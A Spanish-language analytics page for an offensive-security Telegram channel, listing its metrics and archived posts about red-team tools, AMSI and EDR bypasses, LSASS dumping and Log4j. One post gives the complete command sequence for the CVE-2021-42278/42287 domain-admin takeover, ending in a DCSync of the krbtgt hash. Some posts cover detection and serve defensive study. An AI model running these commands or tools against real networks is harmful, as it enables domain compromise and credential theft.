es
Feedback
APT

APT

Ir al canal en Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Mostrar más
Rusia45 554Tecnologías y Aplicaciones8 834

📈 Análisis del canal de Telegram APT

El canal APT (@apt_notes) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 14 682 suscriptores, ocupando la posición 8 834 en la categoría Tecnologías y Aplicaciones y el puesto 45 554 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 682 suscriptores.

Según los últimos datos del 13 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 414, y en las últimas 24 horas de 17, conservando un alto alcance.

  • Estado de verificación: No verificado
  • Tasa de interacción (ER): El promedio de interacción de la audiencia es 50.76%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
  • Alcance de las publicaciones: Cada publicación recibe en promedio 7 449 visualizaciones. En el primer día suele acumular 0 visualizaciones.
  • Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 20.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 14 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 682
Suscriptores
+1724 horas
+1027 días
+41430 días
Archivo de publicaciones
APT
APT
14 682
GitLab CI jobs unmasked passwords scanner https://github.com/Whitespots-OU/gitlab-ci-secrets #tools #secrets #devsecops

APT
APT
14 682
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #andro
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #android #apk #find #secrets #tools

APT
APT
14 682
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redte
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those w
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos. https://github.com/SecuProject/ADenum #ad #ldap #kerberos #enumeration #tools

APT
APT
14 682
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: ht
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_12.ps1 #amsi #bypass #windows #pentest

APT
APT
14 682
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller. Example: 0. Create a сomputer account addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' 1. Clear its SPNs addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController 2. Rename the computer (computer -> DC) renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' 3. Obtain a TGT getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' 4. Reset the computer name renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' 5. Bbtain a service ticket with S4U2self by presenting the previous TGT KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' 6. DCSync by presenting the service ticket KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' # https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html # https://exploit.ph/more-samaccountname-impersonation.html # https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing # https://www.geekby.site/2021/12/samaccountname-spoofing/ # https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
#meme
#meme

APT
APT
14 682
ldapconsole It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes. Features — Authenticate with password — Authenticate with LM:NT hashes — Authenticate with kerberos ticket https://github.com/p0dalirius/ldapconsole #ldap #query #tools

APT
APT
14 682
Log4j RCE — CVE-2021-44228 The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services. # https://www.lunasec.io/docs/blog/log4j-zero-day/ # https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 # https://github.com/whwlsfb/Log4j2Scan # https://github.com/Cybereason/Logout4Shell #apache #log4j #cve #rce

APT
APT
14 682
Example Reports If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports) https://github.com/nationalcptc/report_examples

APT
APT
14 682
Detecting NTLM Relay Attacks https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9 #detection #ntlm #relay #blueteam

APT
APT
14 682
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalir
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalirius/ipsourcebypass #ip #header #bypass #bugbounty

APT
APT
14 682
Process Ghosting — EDR Evasion The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique. https://pentestlaboratories.com/2021/12/08/process-ghosting/ #av #evasion #process #redteam #blueteam

APT
APT
14 682
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line execu
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team. https://github.com/3CORESec/MAL-CL #windows #cli #detection #blueteam #redteam

APT
APT
14 682
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019 How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019. https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/ #kerberos #windows2019 #pentest

APT
APT
14 682
EDRSandBlast EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring. https://github.com/wavestone-cdt/EDRSandblast #lsass #dump #etw #redteam

APT
APT
14 682
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text. https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps #hiberfil #dump #password

APT
APT
14 682
Abusing Leaked Handles to Dump LSASS Memory # https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html # https://github.com/antonioCoco/MalSeclogon #seclogon #lsass #dump #redteam

APT
APT
14 682
#meme
#meme